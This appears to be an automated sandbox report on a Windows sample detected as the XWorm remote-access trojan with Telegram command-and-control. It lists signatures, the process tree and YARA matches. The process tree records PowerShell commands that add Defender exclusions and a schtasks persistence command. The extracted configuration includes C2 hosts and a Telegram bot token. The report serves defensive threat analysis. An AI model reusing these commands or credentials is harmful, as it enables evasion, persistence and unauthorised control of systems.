Edit tour

Windows Analysis Report
ozgpPwVAu1.exe

Overview

General Information

Sample name:	ozgpPwVAu1.exe renamed because original name is a hash value
Original sample name:	622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968.exe
Analysis ID:	1570394
MD5:	784bd7f714cf13880f47c591e7aed7fa
SHA1:	66c44c447a49221b5e61e9552012db6420f561e9
SHA256:	622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968
Tags:	exeuser-Chainskilabs
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates files with lurking names (e.g. Crack.exe)

Drops PE files to the user root directory

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ozgpPwVAu1.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\ozgpPwVAu1.exe" MD5: 784BD7F714CF13880F47C591E7AED7FA)

adawsfaefasfasfg.exe (PID: 7732 cmdline: "C:\Users\user\adawsfaefasfasfg.exe" MD5: 190010C187189B92E49A0ED05F6DDC88)

powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\adawsfaefasfasfg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'adawsfaefasfasfg.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Systen User' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Systen User' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8108 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wasdwasfwasfs.exe (PID: 7756 cmdline: "C:\Users\user\wasdwasfwasfs.exe" MD5: 34452F83F7D58EC91D2CEDF4B24C9764)

powershell.exe (PID: 8032 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\wasdwasfwasfs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wasdwasfwasfs.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\PIN CRACKER V2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

where.exe (PID: 7848 cmdline: where curl MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)

Systen User (PID: 4872 cmdline: "C:\Users\user\AppData\Roaming\Systen User" MD5: 190010C187189B92E49A0ED05F6DDC88)

OpenWith.exe (PID: 5804 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)

svchost.exe (PID: 5716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "carolina-comes.gl.at.ply.gg", "147.185.221.22"], "Port": 12886, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg", "Telegram Chatid": "7538845070", "Version": "XWorm V5.2"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\wasdwasfwasfs.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\wasdwasfwasfs.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\wasdwasfwasfs.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\wasdwasfwasfs.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\wasdwasfwasfs.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8046:$s6: VirtualBox 0x7fa4:$s8: Win32_ComputerSystem 0x89f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8a93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ba8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x86a4:$cnc4: POST / HTTP/1.1
C:\Users\user\adawsfaefasfasfg.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\adawsfaefasfasfg.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\adawsfaefasfasfg.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\adawsfaefasfasfg.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\adawsfaefasfasfg.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88f4:$s6: VirtualBox 0x8852:$s8: Win32_ComputerSystem 0x92d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9371:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9486:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8f4c:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\Systen User	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\Systen User	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\Systen User	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\Systen User	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\Systen User	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88f4:$s6: VirtualBox 0x8852:$s8: Win32_ComputerSystem 0x92d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9371:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9486:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8f4c:$cnc4: POST / HTTP/1.1
Click to see the 10 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x86f4:$s6: VirtualBox 0x8652:$s8: Win32_ComputerSystem 0x90d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9171:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9286:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8d4c:$cnc4: POST / HTTP/1.1
00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x219e4:$s6: VirtualBox 0x2c424:$s6: VirtualBox 0x455de:$s6: VirtualBox 0x4f81e:$s6: VirtualBox 0x21942:$s8: Win32_ComputerSystem 0x2c382:$s8: Win32_ComputerSystem 0x4553c:$s8: Win32_ComputerSystem 0x4f77c:$s8: Win32_ComputerSystem 0x223c4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ce04:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x45f8e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x501ce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22461:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2cea1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x4602b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5026b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22576:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2cfb6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x46140:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x50380:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2203c:$cnc4: POST / HTTP/1.1
00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e46:$s6: VirtualBox 0x7da4:$s8: Win32_ComputerSystem 0x87f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8893:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x89a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x84a4:$cnc4: POST / HTTP/1.1
Process Memory Space: ozgpPwVAu1.exe PID: 7644	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: ozgpPwVAu1.exe PID: 7644	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: adawsfaefasfasfg.exe PID: 7732	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: adawsfaefasfasfg.exe PID: 7732	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: wasdwasfwasfs.exe PID: 7756	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: wasdwasfwasfs.exe PID: 7756	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.wasdwasfwasfs.exe.c80000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
3.0.wasdwasfwasfs.exe.c80000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.wasdwasfwasfs.exe.c80000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.0.wasdwasfwasfs.exe.c80000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8046:$s6: VirtualBox 0x7fa4:$s8: Win32_ComputerSystem 0x89f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8a93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ba8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x86a4:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d3e598.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d3e598.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ozgpPwVAu1.exe.2d3e598.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6246:$s6: VirtualBox 0x61a4:$s8: Win32_ComputerSystem 0x6bf6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6c93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6da8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x68a4:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6af4:$s6: VirtualBox 0x6a52:$s8: Win32_ComputerSystem 0x74d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7571:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7686:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x714c:$cnc4: POST / HTTP/1.1
2.0.adawsfaefasfasfg.exe.eb0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
2.0.adawsfaefasfasfg.exe.eb0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.0.adawsfaefasfasfg.exe.eb0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.0.adawsfaefasfasfg.exe.eb0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88f4:$s6: VirtualBox 0x8852:$s8: Win32_ComputerSystem 0x92d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9371:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9486:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8f4c:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d24b30.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d24b30.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ozgpPwVAu1.exe.2d24b30.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6af4:$s6: VirtualBox 0x6a52:$s8: Win32_ComputerSystem 0x74d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7571:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7686:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x714c:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8046:$s6: VirtualBox 0x12286:$s6: VirtualBox 0x7fa4:$s8: Win32_ComputerSystem 0x121e4:$s8: Win32_ComputerSystem 0x89f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12c36:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8a93:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12cd3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8ba8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12de8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x86a4:$cnc4: POST / HTTP/1.1 0x128e4:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88f4:$s6: VirtualBox 0x13334:$s6: VirtualBox 0x2c4ee:$s6: VirtualBox 0x3672e:$s6: VirtualBox 0x8852:$s8: Win32_ComputerSystem 0x13292:$s8: Win32_ComputerSystem 0x2c44c:$s8: Win32_ComputerSystem 0x3668c:$s8: Win32_ComputerSystem 0x92d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13d14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ce9e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x370de:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9371:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13db1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2cf3b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3717b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9486:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13ec6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2d050:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x37290:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8f4c:$cnc4: POST / HTTP/1.1
0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
